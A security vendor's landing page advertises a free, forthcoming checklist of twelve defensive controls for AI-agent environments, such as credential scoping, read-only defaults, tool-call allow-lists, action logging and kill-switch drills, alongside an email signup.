oktsec
Book a demo
ProductControlSignalAssessmentResearch Book a demo
Free resource

The Agent Security Checklist.

The same checklist we run on client code, distilled from 250+ real vulnerabilities we found across AI-agent systems, MCP servers and developer tools. Vendor-neutral, no product required.

The checklist ships in July 2026. Add your email and we'll send it the day it's ready, plus the occasional new finding. No spam, unsubscribe anytime.

Thanks - you're on the list. We'll send the checklist to your inbox when it ships in July 2026.
Reported to
What's inside

Twelve checks, grouped into four moves.

No theory. Each item is a concrete check you can run against an agent environment this week, with the failure mode it prevents.

01

Inventory every agent environment

List where agents run and what each can reach: repos, tools, credentials, networks.

02

Map the credential blast radius

For each environment, write down the worst action its tokens allow.

03

Separate read from write

Default agents to read-only; make every write an explicit, named grant.

04

Gate privileged tool calls

Put a deterministic allow-list between untrusted input and shell, network and secrets.

05

Pin and verify the supply chain

Lock package sources and verify provenance before an agent installs anything.

06

Treat prompts as untrusted input

Stop filtering content; enforce what the agent is allowed to do regardless of what it read.

07

Log the action, not just the chat

Record the tool calls and effects, in a tamper-evident trail you can review later.

08

Make policy verifiable

Sign what's allowed so a reviewer can prove which rules were in force.

09

Compare expected vs. reported

Diff the policy you assigned against what each environment actually applied.

10

Route exceptions, not everything

Keep aligned environments quiet; send only drift, gaps and mismatches to review.

11

Rehearse the kill switch

Know exactly how to revoke an agent's access fast, and test that it works.

12

Re-audit on every capability change

New tool, new token, new model: re-run the checklist before it ships.

Who it's for

Written for the people who own the risk.

Security

AppSec & security engineering

A concrete starting point for governing agent work without becoming the bottleneck on every action.

Platform

Platform & infrastructure

Roll the controls out once and let environments converge, with no inbound access required.

Engineering

Eng leads shipping agents

Move fast and keep agents productive while only genuine divergence stops for review.

Get the checklist

Send it to my inbox.

Free, vendor-neutral, and drawn from real findings. It ships in July 2026 - add your email and we'll send it the day it's ready.

Thanks - you're on the list. We'll send the checklist to your inbox when it ships in July 2026.